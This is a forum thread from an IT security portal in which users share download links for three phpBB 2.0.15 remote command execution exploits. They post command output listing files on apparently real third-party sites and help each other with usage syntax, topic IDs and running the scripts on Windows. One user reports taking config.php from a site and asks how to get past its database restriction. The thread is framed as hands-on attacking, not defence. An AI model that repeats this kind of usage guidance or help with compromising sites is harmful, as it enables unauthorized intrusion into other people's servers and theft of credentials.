Waraxe IT Security Portal

xgndx · Beginner

(PERL)

** phpBB 2.0.15 RCE exploit by pLuToNiUm 29/6/05**

Download : http://planet.nana.co.il/sustar/2015.txt

--- je.pl www.itwork.com /phpbb/ 625 ls
=== COMMAND: =[ ls ]= ===
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
admin
cache
common.php
config.php
db
docs
extension.inc
faq.php
groupcp.php
images
includes
index.php
language
login.php
memberlist.php
modcp.php
posting.php
privmsg.php
profile.php
search.php
templates
viewforum.php
viewonline.php
viewtopic.php
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

(PHYTON)

**** phpBB 2.0.15 RCE eXploit 2005 by rattle@awarenetwork.org ****

Download : http://www.milw0rm.com/id.php?id=1076

--- lol.py http://www.itwork /phpbb/ 625

phpBB 2.0.15 arbitrary command execution eXploit
2005 by rattle@awarenetwork.org
well, just because there is none.

[www.cayosantamaria.info]$ ls
admin
cache
common.php
config.php
db
docs
extension.inc
faq.php
groupcp.php
images
includes
index.php
language
login.php
memberlist.php
modcp.php
posting.php
privmsg.php
profile.php
search.php
templates
viewforum.php
viewonline.php
viewtopic.php
[www.cayosantamaria.info]$

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

(PERL)

**** Phpbb 2.0.15 RCE eXploit 2005 by dab@digitalsec.net ****

Download : http://downloads.securityfocus.com/vulnerabilities/exploits/phpbb2_0_15.pl

--- php.pl http://www.cayosantamaria.info/phpbb/viewtopic.php?t=625
www.cayosantamaria.info - 80 - phpbb/viewtopic.php?t=625
phpbb> ls

6
admin
6
cache
b
common.php
b
config.php
3
db
5
docs
e
extension.inc
8
faq.php
c
groupcp.php
7
images
9
includes
a
index.php
9
language
a
login.php
f
memberlist.php
a
modcp.php
c
posting.php
c
privmsg.php
c
profile.php
b
search.php
a
templates
e
viewforum.php
f
viewonline.php
e
viewtopic.php
f

phpbb>

diaga · Regular user

Can someone help me out.. not working for me

---
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\me>cd c:\

C:\>php.pl http://site.org/board/viewtopic.php?t=42
C:\php.pl <viewtopic url>

C:\>php.pl http://site.org - 42 - board/viewtopic.php?t=42
C:\php.pl <viewtopic url>

C:\>lol.py http://www.site.org /board/ 42

phpBB 2.0.15 arbitrary command execution eXploit
2005 by rattle@awarenetwork.org
well, just because there is none.
Usage: C:\lol.py <forum> <topic>

forum - fully qualified url to the forum
example: http://www.host.com/phpBB/

topic - ID of an existing topic. Well you
will have to check yourself.

C:\>je.pl www.site.org /board/ 42 ls
[+++++++++++++++++++++++++++++++++++++++++++++++++++++++]

how to use:

2015.pl www.phpbb.com /forum/ 1337 "ls -al"
parameters:
[URL] - server URL e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls
[]+++++++++++++++++++++++++++++++++++++++++++++++++++++[]

C:\>
---

none of them work for me (i replaced site.org). I even tried using the example commands and still get the same message

thanks

shai-tan · Valuable expert

What I do when Im in that situation is use Cygwin for Win32..... Its a Linux emulator that runs on Windows its a very neat program if you download all the packages its great. All you have to do to run perl scripts is copy the .pl file to the main DIR in c:\cygwin and then enter Username@computer ~ > ./file.pl
and it works.

Also you can compile linux C and C++ scripts under windows though they are compiled into .exe 's but you can use them while using cygwin.dll

diaga · Regular user

Diaga@Me ~
$ ls
2015.pl je.pl php.pl

Diaga@Me ~
$ ./je.pl
: bad interpreter: No such file or directory

Diaga@Me ~
$

31337 · Beginner

hello
I got the contents of config.php in a site. But i am stuck as the mysqld allows connection only from localhost. Anyone have any creative idea? pls

shai-tan · Valuable expert

I got one of the 3 working this morning...

howitzer · Regular user

The last one perl works for me .. but when i input the ls command doesnt show anything...

31337 · Beginner

another question how to find the number of topics in a forum?

g30rg3_x · Active user

if you have a url like:

www.itwork.com/forum/viewtopic.php?t=6

the url is: www.itwork.com
the directory is: /forum/
the number of existing topic is: 6

so the value of "t" variable in viewtopic is the number of existing topic..

regards

HHT · Beginner

Yes. it is working for me

C:\>2015.pl target.url /forum/ 11 "ls"
=== COMMAND: =[ ls ]= ===
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
admin
cache
common.php
common.php.orig
config.php
db
extension.inc
faq.php
faq.php.orig
groupcp.php
groupcp.php.orig
groupcp.php.rej
images
includes
index.php
index.php.orig
index.php.rej
i.php
language
login.php
login.php.orig
login.php.rej
memberlist.php
memberlist.php.orig
memberlist.php.rej
modcp.php
......